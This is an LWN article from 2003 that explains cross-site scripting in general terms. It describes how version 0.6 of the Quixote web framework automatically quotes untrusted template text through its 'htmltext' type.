Closing off cross-site scripting holes
[Posted January 15, 2003 by corbet]
When writing web applications, it is easy to lose track of the fact that
HTML is not quite the same as plain text. As a result, erroneous
characters (such as an unescaped "&") can easily slip into a web
page. They can result in poorly rendered pages, RSS files that fail to
load, and lots of email suggesting that the author buy and read a copy of
"HTML for drooling morons." Trust us, we know.
As annoying as that sort of problem can be, it fades into insignificance
when compared to the other issue that arises when text is treated as if it
were HTML: cross-site scripting. If an outside attacker can get your web
application to present arbitrary HTML to another user, that attacker can
often get the victim to disclose information or carry out an unwanted
action. Cross-site scripting problems have afflicted many applications,
and they are unlikely to go away anytime soon. It is just too easy for a
web application programmer to slip up and let untreated text slip through.
Version 0.6 of the Quixote web
application framework, which saw its first beta release last week, includes an
interesting approach to the cross-site scripting problem. Quixote (which
is the framework used by LWN) includes a nice "template" feature which
allows an easy and natural mixing of HTML text and Python code. Text
generated by a template is passed back to the web browser as an HTML
document.
In the current Quixote release, as in most web frameworks, text is sent
directly back without processing or quoting. After all, web templates need
to be able to include HTML tags in their output, and things would not work
very well if those tags were quoted. Quixote provides a function for the
safe quoting of untrusted text, but the programmer must remember to use it
in all the relevant places. Sooner or later, most programmers forget.
Version 0.6, instead, has two kinds of text. Anything which appears in a
literal, quoted string is of type "htmltext," and it is assumed to be
exactly as the programmer wanted it to be (since he or she wrote it that
way). Anything which takes the form of an ordinary Python string, however,
is assumed to need quoting on its way to the browser; this quoting happens
automatically as the template is executed.
The result is that text that comes from a database or other external source
is automatically quoted, and thus can not be used for a cross-site
scripting attack. The programmer no longer needs to worry about quoting
every bit of text that passes through the application. This is, of course,
the way things should be done from a security standpoint. Assume that
everything is suspect in the absence of an explicit statement to the
contrary. This approach, too, can create bugs - HTML tags may end up being
quoted when they should be passed through directly. But that kind of bug
is immediately evident, while a failure to quote is usually invisible -
until it bites you. The new Quixote HTML template mechanism errs on the
side of security and makes failures
happen in the right way.
(
Log in to post comments)